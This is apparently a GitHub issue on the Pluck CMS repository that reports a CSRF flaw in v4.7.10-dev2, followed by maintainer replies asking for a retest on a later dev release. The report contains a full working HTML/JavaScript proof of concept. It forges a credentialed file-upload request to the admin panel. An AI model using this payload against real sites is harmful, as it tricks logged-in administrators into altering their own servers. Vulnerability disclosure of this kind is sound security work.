search

pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org
54 stars 37 forks source link

There is a CSRF vulnerability can add txt file. #82

Closed Lilc1 closed 4 years ago

Lilc1 commented 4 years ago

This problem was found in Pluck v4.7.10-dev2. This CSRF vulnerability can add a txt file via /admin.php?action=abc. poc

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/172.16.1.234\/pluck\/admin.php?action=files", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------18467633426500");
        xhr.withCredentials = true;
        var body = "-----------------------------18467633426500\r\n" + 
          "Content-Disposition: form-data; name=\"filefile\"; filename=\"1.txt\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "hacker\r\n" + 
          "-----------------------------18467633426500\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "-----------------------------18467633426500--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Verification image The uploaded file is stored in the /files/ directory. image

BSteelooper commented 4 years ago

You have to first be logged in to pluck. This is not possible when you are not logged in. when you know the password you can simple browse the file upload page.

BSteelooper commented 4 years ago

Could you please test the latest dev release 4.7.10-dev4? https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

BSteelooper commented 4 years ago

Have you retested with the latest dev version?